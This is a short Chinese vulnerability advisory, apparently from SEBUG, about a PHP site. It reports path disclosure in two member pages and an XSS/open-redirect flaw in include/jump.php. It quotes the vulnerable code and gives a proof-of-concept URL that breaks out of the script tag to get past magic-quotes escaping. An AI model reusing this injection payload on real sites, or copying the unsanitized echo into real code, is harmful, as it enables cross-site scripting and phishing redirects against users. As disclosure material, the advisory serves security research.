漏洞描述:
泄露绝对路径漏洞 member/company.php
member/job.php
然后是跨站,这个得YY一下:
漏洞文件:include/jump.php
以下是漏洞代码: <?php if(!empty($_GET['gurl'])){ echo "<script>location=\"{$_GET['gurl']}\";</script>"; } ?>
SEBUG安全建议:
测试方法:
[www.sebug.net] 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
提交:http://127.0.0.1/dc/include/jump.php?gurl=http://00day.cn 会跳转到http://00day.cn
新手朋友会认为这就是这个跨站的利用了,其实不然,我们可以尝试去闭合他!但PHP有gpc限制,我们该怎么绕?
提交:http://127.0.0.1/dc/include/jump.php?gurl=%23"</script><script>alert(/00day.cn/)</script>/*
|